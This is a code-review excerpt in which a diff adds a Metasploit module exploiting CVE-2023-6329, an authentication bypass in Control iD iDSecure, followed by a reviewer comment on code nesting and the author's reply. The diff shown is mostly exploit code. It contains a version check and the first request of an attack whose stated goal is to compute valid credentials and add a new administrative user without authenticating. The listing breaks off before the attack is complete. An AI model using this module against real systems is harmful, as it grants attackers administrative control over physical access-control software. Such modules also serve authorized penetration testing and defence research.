modules/auxiliary/admin/http/idsecure_auth_bypass.rb

```diff
@@ -0,0 +1,156 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Control iD iDSecure Authentication Bypass (CVE-2023-6329)',
+        'Description' => %q{
+          This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an
+          unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'References' => [
+          ['CVE', '2023-6329'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-36']
+        ],
+        'DisclosureDate' => '2023-11-27',
+        'DefaultOptions' => {
+          'RPORT' => 30443,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('NEW_USER', [true, 'The new administrative user to add to the system', Rex::Text.rand_text_alphanumeric(8)]),
+      OptString.new('NEW_PASSWORD', [true, 'Password for the specified user', Rex::Text.rand_text_alphanumeric(12)])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/util/configUI')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    return CheckCode::Unknown unless res&.code == 401
+
+    data = res.get_json_document
+    version = data['Version']
+    return CheckCode::Unknown if version.nil?
+
+    print_status('Got version: ' + version)
+    return CheckCode::Safe unless Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
+
+    return CheckCode::Appears
+  end
+
+  def run
+    # 1) Obtain the serial and passwordRandom
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/login/unlockGetData')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res.code == 200
```

Comment:
Could we invert this logic to reduce the nesting a bit, applies elsewhere in the module too
```suggestion
    if res.code != 200
     fail_with(Failure::UnexpectedReply, res.to_s)
   end
```

Reply:
I've updated this and the other occurrences to remove nesting. Please let me know in case I missed any.